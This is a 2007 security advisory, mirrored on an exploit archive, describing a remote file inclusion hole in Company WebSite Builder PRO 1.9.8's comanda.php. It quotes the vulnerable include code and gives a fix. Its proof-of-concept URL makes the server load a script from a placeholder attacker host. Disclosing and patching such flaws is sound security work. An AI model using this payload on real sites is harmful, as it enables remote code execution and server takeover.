Company WebSite Builder PRO 1.9.8 (INCLUDE_PATH) RFI Vulnerability

2007-03-15T00:00:00
ID 1337DAY-ID-1591
Type zdt
Reporter the_day
Modified 2007-03-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
Company WebSite Builder PRO 1.9.8 (INCLUDE_PATH) RFI Vulnerability
==================================================================




____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
       \/         \/       \/         \/                              .OR.ID
ECHO_ADV_76$2007

--------------------------------------------------------------------------------------------
[ECHO_ADV_76$2007] Company WebSite Builder PRO (INCLUDE_PATH) Remote File Inclusion Vulnerability
--------------------------------------------- ----------------------------------------------

Author          : Dedi Dwianto a.k.a the_day
Date Found      : March, 15th 2007
Location        : Indonesia, Jakarta
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~

Application     : Company WebSite Builder PRO ( CWB )
version         : 1.9.8
URL             : http://www.grafxsoftware.com/

This software makes it easy to build an e-commerce site that processes credit cards,
wire transfers. This is a great Content Management System that's easy to install and use WITHOUT having
to FTP upload pages every time they need to be updated.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~

- Invalid include function at comanda.php
-----------------------comanda.php------------

<?
...
include($INCLUDE_LANGUAGE_PATH."$LANG.inc.php");
include($INCLUDE_PATH."connection.php");
include_once($INCLUDE_PATH."connection.php");
include_once($INCLUDE_PATH."cls_produs.php");
include_once($INCLUDE_PATH."cls_left_menu.php");
include_once($INCLUDE_PATH."cls_stire.php");
include_once($INCLUDE_PATH."cls_orders.php");
include_once($INCLUDE_PATH."cls_headline_prod.php");
include_once($INCLUDE_PATH."cls_checkout.php");
include_once("cls_download_products.php");
....
?>
----------------------------------------------------------

Input passed to the "$INCLUDE_PATH" parameter in comanda.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.



Proof Of Concept:
~~~~~~~~~~

http://localhost/cwb/comanda.php?INCLUDE_PATH=http://atacker.com/inject.txt?


Solution:
~~

- Sanitize variable $INCLUDE_PATH affected files.
- Turn off register_globals

---------------------------------------------------------------------------

Shoutz:
~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy Nice Girl
~ az001,bomm_3x,matdhule
~ [email protected]
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~
    EcHo Research & Development Center



#  0day.today [2018-04-09]  #